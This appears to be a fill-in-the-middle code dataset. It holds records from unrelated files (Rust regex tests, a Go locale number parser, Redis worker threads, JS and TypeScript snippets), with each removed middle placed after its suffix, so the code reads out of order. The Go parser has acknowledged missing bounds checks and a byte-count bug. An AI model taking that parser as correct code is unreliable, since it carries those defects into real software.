test_lit!(pfx_one_lit3, prefixes, "(?u)☃", M("\\xe2\\x98\\x83"));
test_lit!(pfx_one_lit4, prefixes, "(?ui)☃", M("\\xe2\\x98\\x83"));
test_lit!(pfx_class1,
prefixes,
"[1-4]",
M("1"),
M("2"),
M("3"),
M("4"));
test_lit!(pfx_class2,
prefixes,
"(?u)[☃Ⅰ]",
M("\\xe2\\x85\\xa0"),
M("\\xe2\\x98\\x83"));
test_lit!(pfx_class3,
prefixes,
"(?ui)[☃Ⅰ]",
M("\\xe2\\x85\\xa0"),
M("\\xe2\\x85\\xb0"),
M("\\xe2\\x98\\x83"));
test_lit!(pfx_one_lit_casei1, prefixes, "(?i)a", M("A"), M("a"));
test_lit!(pfx_one_lit_casei2,
prefixes,
"(?i)abc",
M("ABC"),
M("aBC"),
M("AbC"),
M("abC"),
M("ABc"),
M("aBc"),
M("Abc"),
M("abc"));
test_lit!(pfx_group1, prefixes, "(a)", M("a"));
test_lit!(pfx_rep_zero_or_one1, prefixes, "a?");
test_lit!(pfx_rep_zero_or_one2, prefixes, "(?:abc)?");
test_lit!(pfx_rep_zero_or_more1, prefixes, "a*");
test_lit!(pfx_rep_zero_or_more2, prefixes, "(?:abc)*");
test_lit!(pfx_rep_one_or_more1, prefixes, "a+", C("a"));
test_lit!(pfx_rep_one_or_more2, prefixes, "(?:abc)+", C("abc"));
test_lit!(pfx_rep_nested_one_or_more, prefixes, "(?:a+)+", C("a"));
test_lit!(pfx_rep_range1, prefixes, "a{0}");
test_lit!(pfx_rep_range2, prefixes, "a{0,}");
test_lit!(pfx_rep_range3, prefixes, "a{0,1}");
test_lit!(pfx_rep_range4, prefixes, "a{1}", M("a"));
test_lit!(pfx_rep_range5, prefixes, "a{2}", M("aa"));
test_lit!(pfx_rep_range6, prefixes, "a{1,2}", C("a"));
test_lit!(pfx_rep_range7, prefixes, "a{2,3}", C("aa"));
// Test regexes with concatenations.
test_lit!(pfx_cat1, prefixes, "(?:a)(?:b)", M("ab"));
test_lit!(pfx_cat2, prefixes, "[ab]z", M("az"), M("bz"));
test_lit!(pfx_cat3,
prefixes,
"(?i)[ab]z",
M("AZ"),
M("BZ"),
M("aZ"),
M("bZ"),
M("Az"),
M("Bz"),
M("az"),
M("bz"));
test_lit!(pfx_cat4,
prefixes,
"[ab][yz]",
M("ay"),
M("by"),
M("az"),
M("bz"));
test_lit!(pfx_cat5, prefixes, "a*b", C("a"), M("b"));
test_lit!(pfx_cat6, prefixes, "a*b*c", C("a"), C("b"), M("c"));
test_lit!(pfx_cat7, prefixes, "a*b*c+", C("a"), C("b"), C("c"));
test_lit!(pfx_cat8, prefixes, "a*b+c", C("a"), C("b"));
test_lit!(pfx_cat9, prefixes, "a*b+c*", C("a"), C("b"));
test_lit!(pfx_cat10, prefixes, "ab*", C("ab"), M("a"));
test_lit!(pfx_cat11, prefixes, "ab*c", C("ab"), M("ac"));
test_lit!(pfx_cat12, prefixes, "ab+", C("ab"));
test_lit!(pfx_cat13, prefixes, "ab+c", C("ab"));
test_lit!(pfx_cat14, prefixes, "a^", C("a"));
test_lit!(pfx_cat15, prefixes, "$a");
test_lit!(pfx_cat16, prefixes, r"ab*c", C("ab"), M("ac"));
test_lit!(pfx_cat17, prefixes, r"ab+c", C("ab"));
test_lit!(pfx_cat18, prefixes, r"z*azb", C("z"), M("azb"));
test_lit!(pfx_cat19, prefixes, "a.z", C("a"));
// Test regexes with alternations.
test_lit!(pfx_alt1, prefixes, "a|b", M("a"), M("b"));
test_lit!(pfx_alt2,
prefixes,
"[1-3]|b",
M("1"),
M("2"),
M("3"),
M("b"));
test_lit!(pfx_alt3, prefixes, "y(?:a|b)z", M("yaz"), M("ybz"));
test_lit!(pfx_alt4, prefixes, "a|b*");
test_lit!(pfx_alt5, prefixes, "a|b+", M("a"), C("b"));
test_lit!(pfx_alt6, prefixes, "a|(?:b|c*)");
test_lit!(pfx_alt7,
prefixes,
"(a|b)*c|(a|ab)*c",
C("a"),
C("b"),
M("c"),
C("a"),
C("ab"),
M("c"));
test_lit!(pfx_alt8, prefixes, "a*b|c", C("a"), M("b"), M("c"));
// Test regexes with empty assertions.
test_lit!(pfx_empty1, prefixes, "^a", M("a"));
test_lit!(pfx_empty2, prefixes, "^abc", M("abc"));
test_lit!(pfx_empty3, prefixes, "(?:^abc)|(?:^z)", M("abc"), M("z"));
// Make sure some curious regexes have no prefixes.
test_lit!(pfx_nothing1, prefixes, ".");
test_lit!(pfx_nothing2, prefixes, "(?s).");
test_lit!(pfx_nothing3, prefixes, "^");
test_lit!(pfx_nothing4, prefixes, "$");
test_lit!(pfx_nothing6, prefixes, "(?m)$");
test_lit!(pfx_nothing7, prefixes, r"\b");
test_lit!(pfx_nothing8, prefixes, r"\B");
// Test a few regexes that defeat any prefix literal detection.
test_lit!(pfx_defeated1, prefixes, ".a");
test_lit!(pfx_defeated2, prefixes, "(?s).a");
test_lit!(pfx_defeated3, prefixes, "a*b*c*");
test_lit!(pfx_defeated4, prefixes, "a|.");
test_lit!(pfx_defeated5, prefixes, ".|a");
test_lit!(pfx_defeated6, prefixes, "a|^");
test_lit!(pfx_defeated7, prefixes, ".(?:a(?:b)(?:c))");
test_lit!(pfx_defeated8, prefixes, "$a");
test_lit!(pfx_defeated9, prefixes, "(?m)$a");
test_lit!(pfx_defeated10, prefixes, r"\ba");
test_lit!(pfx_defeated11, prefixes, r"\Ba");
test_lit!(pfx_defeated12, prefixes, "^*a");
test_lit!(pfx_defeated13, prefixes, "^+a");
test_lit!(pfx_crazy1,
prefixes,
r"M[ou]'?am+[ae]r .*([AEae]l[- ])?[GKQ]h?[aeu]+([dtz][dhz]?)+af[iy]",
C("Mo\\'am"),
C("Mu\\'am"),
C("Moam"),
C("Muam"));
// ************************************************************************
// Tests for quiting prefix literal search.
// ************************************************************************
macro_rules! test_exhausted {
($name:ident, $which:ident, $re:expr) => {
test_exhausted!($name, $which, $re,);
};
($name:ident, $which:ident, $re:expr, $($lit:expr),*) => {
#[test]
fn $name() {
let expr = Expr::parse($re).unwrap();
let mut lits = Literals::empty();
lits.set_limit_size(20).set_limit_class(10);
$which(&mut lits, &expr);
assert_lit_eq!(Unicode, lits, $($lit),*);
let expr = ExprBuilder::new().allow_bytes(true).unicode(false)
.parse($re).unwrap();
let mut lits = Literals::empty();
lits.set_limit_size(20).set_limit_class(10);
$which(&mut lits, &expr);
assert_lit_eq!(Bytes, lits, $($lit),*);
}
};
}
// These test use a much lower limit than the default so that we can
// write test cases of reasonable size.
test_exhausted!(pfx_exhausted1, prefixes, "[a-z]");
test_exhausted!(pfx_exhausted2, prefixes, "[a-z]*A");
test_exhausted!(pfx_exhausted3, prefixes, "A[a-z]Z", C("A"));
test_exhausted!(pfx_exhausted4,
prefixes,
"(?i)foobar",
C("FO"),
C("fO"),
C("Fo"),
C("fo"));
test_exhausted!(pfx_exhausted5,
prefixes,
"(?:ab){100}",
C("abababababababababab"));
test_exhausted!(pfx_exhausted6,
prefixes,
"(?:(?:ab){100})*cd",
C("ababababab"),
M("cd"));
test_exhausted!(pfx_exhausted7,
prefixes,
"z(?:(?:ab){100})*cd",
C("zababababab"),
M("zcd"));
test_exhausted!(pfx_exhausted8,
prefixes,
"aaaaaaaaaaaaaaaaaaaaz",
C("aaaaaaaaaaaaaaaaaaaa"));
// ************************************************************************
// Tests for suffix literal extraction.
// ************************************************************************
// Elementary tests.
test_lit!(sfx_one_lit1, suffixes, "a", M("a"));
test_lit!(sfx_one_lit2, suffixes, "abc", M("abc"));
test_lit!(sfx_one_lit3, suffixes, "(?u)☃", M("\\xe2\\x98\\x83"));
test_lit!(sfx_one_lit4, suffixes, "(?ui)☃", M("\\xe2\\x98\\x83"));
test_lit!(sfx_class1,
suffixes,
"[1-4]",
M("1"),
M("2"),
M("3"),
M("4"));
test_lit!(sfx_class2,
suffixes,
"(?u)[☃Ⅰ]",
M("\\xe2\\x85\\xa0"),
M("\\xe2\\x98\\x83"));
test_lit!(sfx_class3,
suffixes,
"(?ui)[☃Ⅰ]",
M("\\xe2\\x85\\xa0"),
M("\\xe2\\x85\\xb0"),
M("\\xe2\\x98\\x83"));
test_lit!(sfx_one_lit_casei1, suffixes, "(?i)a", M("A"), M("a"));
test_lit!(sfx_one_lit_casei2,
suffixes,
"(?i)abc",
M("ABC"),
M("ABc"),
M("AbC"),
M("Abc"),
M("aBC"),
M("aBc"),
M("abC"),
M("abc"));
test_lit!(sfx_group1, suffixes, "(a)", M("a"));
test_lit!(sfx_rep_zero_or_one1, suffixes, "a?");
test_lit!(sfx_rep_zero_or_one2, suffixes, "(?:abc)?");
test_lit!(sfx_rep_zero_or_more1, suffixes, "a*");
test_lit!(sfx_rep_zero_or_more2, suffixes, "(?:abc)*");
test_lit!(sfx_rep_one_or_more1, suffixes, "a+", C("a"));
test_lit!(sfx_rep_one_or_more2, suffixes, "(?:abc)+", C("abc"));
test_lit!(sfx_rep_nested_one_or_more, suffixes, "(?:a+)+", C("a"));
test_lit!(sfx_rep_range1, suffixes, "a{0}");
test_lit!(sfx_rep_range2, suffixes, "a{0,}");
test_lit!(sfx_rep_range3, suffixes, "a{0,1}");
test_lit!(sfx_rep_range4, suffixes, "a{1}", M("a"));
test_lit!(sfx_rep_range5, suffixes, "a{2}", M("aa"));
test_lit!(sfx_rep_range6, suffixes, "a{1,2}", C("a"));
test_lit!(sfx_rep_range7, suffixes, "a{2,3}", C("aa"));
// Test regexes with concatenations.
test_lit!(sfx_cat1, suffixes, "(?:a)(?:b)", M("ab"));
test_lit!(sfx_cat2, suffixes, "[ab]z", M("az"), M("bz"));
test_lit!(sfx_cat3,
suffixes,
"(?i)[ab]z",
M("AZ"),
M("Az"),
M("BZ"),
M("Bz"),
M("aZ"),
M("az"),
M("bZ"),
M("bz"));
test_lit!(sfx_cat4,
suffixes,
"[ab][yz]",
M("ay"),
M("az"),
M("by"),
M("bz"));
test_lit!(sfx_cat5, suffixes, "a*b", C("ab"), M("b"));
test_lit!(sfx_cat6, suffixes, "a*b*c", C("bc"), C("ac"), M("c"));
test_lit!(sfx_cat7, suffixes, "a*b*c+", C("c"));
test_lit!(sfx_cat8, suffixes, "a*b+c", C("bc"));
test_lit!(sfx_cat9, suffixes, "a*b+c*", C("c"), C("b"));
test_lit!(sfx_cat10, suffixes, "ab*", C("b"), M("a"));
test_lit!(sfx_cat11, suffixes, "ab*c", C("bc"), M("ac"));
test_lit!(sfx_cat12, suffixes, "ab+", C("b"));
test_lit!(sfx_cat13, suffixes, "ab+c", C("bc"));
test_lit!(sfx_cat14, suffixes, "a^");
test_lit!(sfx_cat15, suffixes, "$a", C("a"));
test_lit!(sfx_cat16, suffixes, r"ab*c", C("bc"), M("ac"));
test_lit!(sfx_cat17, suffixes, r"ab+c", C("bc"));
test_lit!(sfx_cat18, suffixes, r"z*azb", C("zazb"), M("azb"));
test_lit!(sfx_cat19, suffixes, "a.z", C("z"));
// Test regexes with alternations.
test_lit!(sfx_alt1, suffixes, "a|b", M("a"), M("b"));
test_lit!(sfx_alt2,
suffixes,
"[1-3]|b",
M("1"),
M("2"),
M("3"),
M("b"));
test_lit!(sfx_alt3, suffixes, "y(?:a|b)z", M("yaz"), M("ybz"));
test_lit!(sfx_alt4, suffixes, "a|b*");
test_lit!(sfx_alt5, suffixes, "a|b+", M("a"), C("b"));
test_lit!(sfx_alt6, suffixes, "a|(?:b|c*)");
test_lit!(sfx_alt7,
suffixes,
"(a|b)*c|(a|ab)*c",
C("ac"),
C("bc"),
M("c"),
C("ac"),
C("abc"),
M("c"));
test_lit!(sfx_alt8, suffixes, "a*b|c", C("ab"), M("b"), M("c"));
// Test regexes with empty assertions.
test_lit!(sfx_empty1, suffixes, "a$", M("a"));
// Make sure some curious regexes have no suffixes.
test_lit!(sfx_nothing1, suffixes, ".");
test_lit!(sfx_nothing2, suffixes, "(?s).");
test_lit!(sfx_nothing3, suffixes, "^");
test_lit!(sfx_nothing4, suffixes, "$");
test_lit!(sfx_nothing6, suffixes, "(?m)$");
test_lit!(sfx_nothing7, suffixes, r"\b");
test_lit!(sfx_nothing8, suffixes, r"\B");
// Test a few regexes that defeat any suffix literal detection.
test_lit!(sfx_defeated1, suffixes, "a.");
test_lit!(sfx_defeated2, suffixes, "(?s)a.");
test_lit!(sfx_defeated3, suffixes, "a*b*c*");
test_lit!(sfx_defeated4, suffixes, "a|.");
test_lit!(sfx_defeated5, suffixes, ".|a");
test_lit!(sfx_defeated6, suffixes, "a|^");
test_lit!(sfx_defeated7, suffixes, "(?:a(?:b)(?:c)).");
test_lit!(sfx_defeated8, suffixes, "a^");
test_lit!(sfx_defeated9, suffixes, "(?m)a$");
test_lit!(sfx_defeated10, suffixes, r"a\b");
test_lit!(sfx_defeated11, suffixes, r"a\B");
test_lit!(sfx_defeated12, suffixes, "a^*");
test_lit!(sfx_defeated13, suffixes, "a^+");
// These test use a much lower limit than the default so that we can
// write test cases of reasonable size.
test_exhausted!(sfx_exhausted1, suffixes, "[a-z]");
test_exhausted!(sfx_exhausted2, suffixes, "A[a-z]*");
test_exhausted!(sfx_exhausted3, suffixes, "A[a-z]Z", C("Z"));
test_exhausted!(sfx_exhausted4,
suffixes,
"(?i)foobar",
C("AR"),
C("Ar"),
C("aR"),
C("ar"));
test_exhausted!(sfx_exhausted5,
suffixes,
"(?:ab){100}",
C("abababababababababab"));
test_exhausted!(sfx_exhausted6,
suffixes,
"cd(?:(?:ab){100})*",
C("ababababab"),
M("cd"));
test_exhausted!(sfx_exhausted7,
suffixes,
"cd(?:(?:ab){100})*z",
C("abababababz"),
M("cdz"));
test_exhausted!(sfx_exhausted8,
suffixes,
"zaaaaaaaaaaaaaaaaaaaa",
C("aaaaaaaaaaaaaaaaaaaa"));
// ************************************************************************
// Tests for generating unambiguous literal sets.
// ************************************************************************
macro_rules! test_unamb {
($name:ident, $given:expr, $expected:expr) => {
#[test]
fn $name() {
let given: Vec<Lit> =
$given
.into_iter()
.map(|ul| {
let cut = ul.is_cut();
Lit { v: ul.v.into_bytes(), cut: cut }
})
.collect();
let lits = create_lits(given);
let got = lits.unambiguous_prefixes();
assert_eq!($expected, escape_lits(got.literals()));
}
};
}
test_unamb!(unambiguous1, vec![M("z"), M("azb")], vec![C("a"), C("z")]);
test_unamb!(unambiguous2,
vec![M("zaaaaaa"), M("aa")],
vec![C("aa"), C("z")]);
test_unamb!(unambiguous3,
vec![M("Sherlock"), M("Watson")],
vec![M("Sherlock"), M("Watson")]);
test_unamb!(unambiguous4, vec![M("abc"), M("bc")], vec![C("a"), C("bc")]);
test_unamb!(unambiguous5, vec![M("bc"), M("abc")], vec![C("a"), C("bc")]);
test_unamb!(unambiguous6, vec![M("a"), M("aa")], vec![C("a")]);
test_unamb!(unambiguous7, vec![M("aa"), M("a")], vec![C("a")]);
test_unamb!(unambiguous8, vec![M("ab"), M("a")], vec![C("a")]);
test_unamb!(unambiguous9,
vec![M("ac"), M("bc"), M("c"), M("ac"), M("abc"), M("c")],
vec![C("a"), C("b"), C("c")]);
test_unamb!(unambiguous10,
vec![M("Mo'"), M("Mu'"), M("Mo"), M("Mu")],
vec![C("Mo"), C("Mu")]);
test_unamb!(unambiguous11,
vec![M("zazb"), M("azb")],
vec![C("azb"), C("z")]);
test_unamb!(unambiguous12, vec![M("foo"), C("foo")], vec![C("foo")]);
// ************************************************************************
// Tests for suffix trimming.
// ************************************************************************
macro_rules! test_trim {
($name:ident, $trim:expr, $given:expr, $expected:expr) => {
#[test]
fn $name() {
let given: Vec<Lit> =
$given
.into_iter()
.map(|ul| {
let cut = ul.is_cut();
Lit { v: ul.v.into_bytes(), cut: cut }
})
.collect();
let lits = create_lits(given);
let got = lits.trim_suffix($trim).unwrap();
assert_eq!($expected, escape_lits(got.literals()));
}
}
}
test_trim!(trim1, 1, vec![M("ab"), M("yz")], vec![C("a"), C("y")]);
test_trim!(trim2, 1, vec![M("abc"), M("abd")], vec![C("ab")]);
test_trim!(trim3, 2, vec![M("abc"), M("abd")], vec![C("a")]);
test_trim!(trim4, 2, vec![M("abc"), M("ghij")], vec![C("a"), C("gh")]);
// ************************************************************************
// Tests for longest common prefix.
// ************************************************************************
macro_rules! test_lcp {
($name:ident, $given:expr, $expected:expr) => {
#[test]
fn $name() {
let given: Vec<Lit> =
$given
.into_iter()
.map(|s: &str| Lit {
v: s.to_owned().into_bytes(),
cut: false,
})
.collect();
let lits = create_lits(given);
let got = lits.longest_common_prefix();
assert_eq!($expected, escape_bytes(got));
}
};
}
test_lcp!(lcp1, vec!["a"], "a");
test_lcp!(lcp2, vec![], "");
test_lcp!(lcp3, vec!["a", "b"], "");
test_lcp!(lcp4, vec!["ab", "ab"], "ab");
test_lcp!(lcp5, vec!["ab", "a"], "a");
test_lcp!(lcp6, vec!["a", "ab"], "a");
test_lcp!(lcp7, vec!["ab", "b"], "");
test_lcp!(lcp8, vec!["b", "ab"], "");
test_lcp!(lcp9, vec!["foobar", "foobaz"], "fooba");
test_lcp!(lcp10, vec!["foobar", "foobaz", "a"], "");
test_lcp!(lcp11, vec!["a", "foobar", "foobaz"], "");
test_lcp!(lcp12, vec!["foo", "flub", "flab", "floo"], "f");
// ************************************************************************
// Tests for longest common suffix.
// ************************************************************************
macro_rules! test_lcs {
($name:ident, $given:expr, $expected:expr) => {
#[test]
fn $name() {
let given: Vec<Lit> =
$given
.into_iter()
.map(|s: &str| Lit {
v: s.to_owned().into_bytes(),
cut: false,
})
.collect();
let lits = create_lits(given);
let got = lits.longest_common_suffix();
assert_eq!($expected, escape_bytes(got));
}
};
}
test_lcs!(lcs1, vec!["a"], "a");
test_lcs!(lcs2, vec![], "");
test_lcs!(lcs3, vec!["a", "b"], "");
test_lcs!(lcs4, vec!["ab", "ab"], "ab");
test_lcs!(lcs5, vec!["ab", "a"], "");
test_lcs!(lcs6, vec!["a", "ab"], "");
test_lcs!(lcs7, vec!["ab", "b"], "b");
test_lcs!(lcs8, vec!["b", "ab"], "b");
test_lcs!(lcs9, vec!["barfoo", "bazfoo"], "foo");
test_lcs!(lcs10, vec!["barfoo", "bazfoo", "a"], "");
test_lcs!(lcs11, vec!["a", "barfoo", "bazfoo"], "");
test_lcs!(lcs12, vec!["flub", "bub", "boob", "dub"], "b");
}
| cut |
decimalformat.go | package lxstrconv
import (
"math"
"strconv"
"unicode"
"unicode/utf8"
"golang.org/x/text/language"
"golang.org/x/text/message"
"golang.org/x/text/number"
)
// acceptRune returns the length of r in bytes if r is the first rune in s,
// otherwise returns zero.
func acceptRune(r rune, s string) int {
if f, ok := firstRune(s); ok && (f == r) {
return utf8.RuneLen(r)
} else {
return 0
}
}
// firstRune returns the first rune in a string and true, or (_, false).
func firstRune(s string) (rune, bool) {
for _, c := range s {
return c, true
}
return runeNone, false
}
// guessDecimalGroupSeparator guesses, for a printer in a given locale,
// the group separator rune in a decimal number system e.g. comma for British.
func guessDecimalGroupSeparator(p *message.Printer) rune {
// heuristic: any rune that appears at least twice is probably a comma
s := p.Sprint(number.Decimal(1234567890))
return repeatingRune(s)
}
// guessDecimalPointSeparator guesses, for a printer in a given locale,
// the decimal point rune in a decimal number system, e.g. period for British.
func guessDecimalPoint(p *message.Printer) rune {
// heuristic: any rune that is common to both these strings is probably a
// decimal point. Concat the strings and find any repeated rune.
s1 := p.Sprint(number.Decimal(1.23))
s2 := p.Sprint(number.Decimal(4.56))
s := s1 + s2
return repeatingRune(s)
}
// guessDecimalDigits guesses, for a printer in a given locale, the digits
// representing the values 0 to 9.
func guessDecimalDigits(p *message.Printer, out *[10]rune) {
for i := 0; i < 10; i++ {
s := []rune(p.Sprint(number.Decimal(i)))
if len(s) == 1 {
out[i] = s[0]
} else {
out[i] = runeNone
}
}
}
// decimalFormat defines how a decimal (base-10) number should be parsed for a
// given locale. Note that the behaviour is undefined for locales that have
// non-base-10 number systems.
//
// This structure is currently internal until we have more confidence it is
// correct for all languages with decimal number systems.
type decimalFormat struct {
// GroupSeparator is a digits separator such as commas for thousands. In
// addition to any separator defined here, a parser will ignore whitespace.
GroupSeparator rune
// Point is separator between the integer and fractional part of
// a decimal number.
Point rune
// Digits are an ascending list of digit runes
Digits [10]rune
}
func (f decimalFormat) ParseInt(s string) (int64, error) {
if len(s) == 0 { return 0, strconv.ErrSyntax }
value, length, err := f.AcceptInt(s)
if err != nil { return 0, err }
if len(s) != length { return 0, strconv.ErrSyntax }
return value, nil
}
func (f decimalFormat) ParseFloat(s string) (float64, error) {
if len(s) == 0 { return 0, strconv.ErrSyntax }
value, length, err := f.AcceptFloat(s)
if err != nil { return 0, err }
if len(s) != length { return 0, strconv.ErrSyntax }
return value, nil
}
// NewDecimalFormat constructs, for a given locale, a NumberFormat that
// defines how a decimal (base-10) number should be parsed. Note that the
// behaviour is undefined for locales that have non-base-10 number systems.
func NewDecimalFormat(tag language.Tag) NumberFormat {
// Unfortunately, I couldn't find any exported symbols in /x/text that
// gives this information directly (as would be ideal). Therefore this
// function works by printing numbers in the current locale and using
// heuristics to guess the correct separators.
p := message.NewPrinter(tag)
format := decimalFormat{
GroupSeparator: guessDecimalGroupSeparator(p),
Point: guessDecimalPoint(p),
}
guessDecimalDigits(p, &format.Digits)
return format
}
// returns (0-9, true) for a decimal digit in any language, or (_, false)
func | (d rune, digits *[10]rune) (int, bool) {
for i := 0; i < 10; i++ {
if d == digits[i] { return i, true }
}
return 0, false
}
// AcceptInteger parses as much of an integer number as possible. It returns a
// 2 tuple: the value of the parsed integer, and the length of the characters
// successfully parsed. For example, for some locales, the string "1,000X"
// returns (1000, 5) and the string "foo" returns (0, 0).
//
// Err is always nil, strconv.ErrRange or strconv.ErrSyntax
func (f decimalFormat) AcceptInt(s string) (value int64, length int, err error) {
if len(s) == 0 { return 0, 0, nil }
if s[0] == '-' {
// TODO better negative check e.g. "(1)" for "-1"
v, l, _ := f.AcceptUint(s[1:])
// TODO bounds check
if l > 0 {
return int64(v) * -1, l + 1, nil
} else {
return 0, 0, nil
}
}
// TODO bounds check
v, l, err := f.AcceptUint(s)
return int64(v), l, nil
}
// AcceptUint: see AcceptInt
func (f decimalFormat) AcceptUint(s string) (value uint64, length int, err error) {
var accu uint64
for i, c := range s {
if c == f.GroupSeparator {
// pass
} else if unicode.IsSpace(c) {
// pass
} else if d, ok := decimalRuneToInt(c, &f.Digits); ok {
accu *= 10
accu += uint64(d)
// TODO bounds check
} else {
// TODO this count is runes but should be bytes!
return accu, i, nil
}
}
return accu, len(s), nil
}
// AcceptFloat parses as much of a floating point number as possible. It returns
// a 2 tuple: the value of the parsed float, and the length of the characters
// successfully parsed. For example, for some locales, the string "1.23X"
// returns (1.23, 4) and the string "foo" returns (0.0, 0).
//
// Err is always nil, strconv.ErrRange or strconv.ErrSyntax
func (f decimalFormat) AcceptFloat(s string) (value float64, length int, err error) {
var left, right int64
var leftLen, rightLen, pointLen int
var fLeft, fRight float64
// accept leading decimal point
if first, ok := firstRune(s); ok && first != f.Point {
left, leftLen, err = f.AcceptInt(s)
// TODO check err (Currently always nil)
if leftLen == 0 { return 0, 0, nil }
fLeft = float64(left)
}
pointLen = acceptRune(f.Point, s[leftLen:])
if pointLen > 0 && (s[leftLen +pointLen] != '-') {
right, rightLen, err = f.AcceptInt(s[leftLen +pointLen:])
// TODO check err (currently always nil)
}
if right > 0.0 {
fRight = float64(right)
places := float64(1.0 + math.Floor(math.Log10(fRight)))
fRight *= math.Pow(0.1, places)
fRight = math.Copysign(fRight, fLeft)
}
value = fLeft + fRight
length = leftLen + pointLen + rightLen
return value, length, nil
}
| decimalRuneToInt |
function.get_connectivitytable_index.min.js | function | (a){"\n"!=a[a.length-1]&&(a+="\n"),idx={};var b=0,c="",d=a.match(/[^\r\n]+/g);for(var e in d){var f=d[e];if(0==b){var g=f.match(/([0-9]+)(?:\t|[ ]{2,})([^\n]+)/);c=g[2],b=parseInt(g[1]),idx[c]={sequence:"",structure:".".repeat(b)}}else{var g=f.match(/[^\t\ ]+/g);idx[c].sequence+=g[1];var h=parseInt(g[4]);if(0!=h){var i=idx[c].structure.split("");i[h-1]="(",i[parseInt(g[0])-1]=")",idx[c].structure=i.join("")}b-=1}}return idx} | get_connectivitytable_index |
taxi-path-node.js | import r from 'restructure';
import Entity from '../entity';
import { Vec3Float } from '../../types';
export default Entity({
id: r.uint32le,
pathID: r.uint32le,
nodeIndex: r.uint32le,
mapID: r.uint32le,
position: Vec3Float,
flags: r.uint32le,
delay: r.uint32le,
arrivalEventID: r.uint32le, | }); | departureEventID: r.uint32le |
workers.rs | use std::{io, thread, time};
use std::ops::DerefMut;
use std::thread::JoinHandle;
use std::time::Duration;
use crossterm::event::{KeyCode, KeyModifiers};
use crossterm::event;
use crossterm::event::Event::Key;
use flume::{Receiver, Sender};
use log::error;
use r2d2::Pool;
use redis::{Client, Connection, RedisError};
use crate::event::{AppEvent, RedisRequest, RedisResult};
use crate::metric::Metric;
use crate::metric::slow_log::SlowLog;
pub fn setup_terminal_worker(tx: Sender<AppEvent>) -> io::Result<JoinHandle<()>> {
thread::Builder::new().name("terminal-events".into()).spawn(move || loop {
if let Ok(event) = event::read() {
if let Key(key) = event {
if key.code == KeyCode::Char('q') || (key.modifiers == KeyModifiers::CONTROL && key.code == KeyCode::Char('c')) {
if let Err(e) = tx.send(AppEvent::Terminate) {
error!("{}", e);
}
return;
}
}
if let Err(e) = tx.send(AppEvent::Terminal(event)) {
error!("{}", e);
}
}
})
}
pub fn setup_tick_worker(tx: Sender<AppEvent>, tick_rate: Duration) -> io::Result<JoinHandle<()>> {
thread::Builder::new().name("tick-event".into()).spawn(move || loop {
// println!("Tick {:?}", thread::current().name());
if let Err(e) = tx.send(AppEvent::Tick) {
error!("{}", e);
break;
}
thread::sleep(tick_rate);
})
}
pub fn setup_redis_workers(tx: Sender<AppEvent>, rx: Receiver<AppEvent>, worker_number: usize, pool: Pool<Client>) -> io::Result<Vec<JoinHandle<()>>> {
let mut workers = Vec::with_capacity(worker_number);
for i in 0..worker_number {
let rx = rx.clone();
let tx = tx.clone();
let pool = pool.clone();
let name = format!("redis-worker-{}", i);
let worker = thread::Builder::new().name(name).spawn(move || {
// println!("created {:?}", thread::current().name());
loop {
let event = rx.recv().unwrap_or(AppEvent::Terminate);
match event {
AppEvent::Request(request) => {
let p = &mut pool.get();
let client = match p {
Ok(c) => c.deref_mut(),
Err(e) => {
error!("{}", e);
continue;// or break?
}
};
let result = match request {
RedisRequest::Info => {
match info(client) {
Ok(result) => { result }
Err(e) => {
error!("{}", e);
continue;// or break?
}
}
}
RedisRequest::SlowLog => {
match slow_log(client) {
Ok(result) => { result }
Err(e) => {
error!("{}", e);
continue;// or break?
}
}
}
};
if let Err(e) = tx.send(result) {
error!("{}", e);
}
}
AppEvent::Terminate => {
break;
}
_ => {}
};
}
})?;
workers.push(worker);
}
Ok(workers)
}
fn info(client: &mut Connection) -> Result<AppEvent, RedisError> {
let start = time::Instant::now();
let info = redis::cmd("info").arg("all").query::<String>(client)?;
let latency = start.elapsed().as_millis();
Ok(AppEvent::Result(RedisResult::Info(Metric::from(info).latency(latency))))
}
fn slow_log(client: &mut Connection) -> Result<AppEvent, RedisError> | {
let v = redis::cmd("slowlog").arg("get").arg("50").query::<Vec<Vec<(u64, i64, i64, Vec<String>, String, String)>>>(client)?;
Ok(AppEvent::Result(RedisResult::SlowLog(SlowLog::from(v))))
} |
|
client-state-log.model.ts | public id: number,
public date: string,
public time: string,
public filename: string
) { }
}
export class ClientStateLogs {
constructor(
public logItems: ClientStateLog[]
) { }
} | export class ClientStateLog {
constructor(
|
|
web.go | package logs
import (
"context"
"errors"
"fmt"
"html/template"
"net/http"
"strconv"
"strings"
"github.com/jonas747/discordgo"
"github.com/jonas747/yagpdb/bot"
"github.com/jonas747/yagpdb/bot/botrest"
"github.com/jonas747/yagpdb/common"
"github.com/jonas747/yagpdb/logs/models"
"github.com/jonas747/yagpdb/web"
"github.com/volatiletech/null"
"github.com/volatiletech/sqlboiler/boil"
"goji.io"
"goji.io/pat"
)
var AuthorColors = []string{
"7c7cff", // blue-ish
"529fb7", // lighter blue
"4aa085", // dark-green
"7ea04a", // lighter green
"a0824a", // brown
"a04a4a", // red
"a04a89", // purple?
}
type DeleteData struct {
ID int64
}
type ConfigFormData struct {
UsernameLoggingEnabled bool
NicknameLoggingEnabled bool
ManageMessagesCanViewDeleted bool
EveryoneCanViewDeleted bool
BlacklistedChannels []string
MessageLogsAllowedRoles []int64
}
func (lp *Plugin) InitWeb() {
web.LoadHTMLTemplate("../../logs/assets/logs_control_panel.html", "templates/plugins/logs_control_panel.html")
web.LoadHTMLTemplate("../../logs/assets/logs_view.html", "templates/plugins/logs_view.html")
web.AddSidebarItem(web.SidebarCategoryTools, &web.SidebarItem{
Name: "Logging",
URL: "logging/",
Icon: "fas fa-database",
})
web.ServerPublicMux.Handle(pat.Get("/logs/:id"), web.RenderHandler(LogFetchMW(HandleLogsHTML, true), "public_server_logs"))
web.ServerPublicMux.Handle(pat.Get("/logs/:id/"), web.RenderHandler(LogFetchMW(HandleLogsHTML, true), "public_server_logs"))
web.ServerPublicMux.Handle(pat.Get("/log/:id"), web.RenderHandler(LogFetchMW(HandleLogsHTML, false), "public_server_logs"))
web.ServerPublicMux.Handle(pat.Get("/log/:id/"), web.RenderHandler(LogFetchMW(HandleLogsHTML, false), "public_server_logs"))
logCPMux := goji.SubMux()
web.CPMux.Handle(pat.New("/logging"), logCPMux)
web.CPMux.Handle(pat.New("/logging/*"), logCPMux)
cpGetHandler := web.ControllerHandler(HandleLogsCP, "cp_logging")
logCPMux.Handle(pat.Get("/"), cpGetHandler)
logCPMux.Handle(pat.Get(""), cpGetHandler)
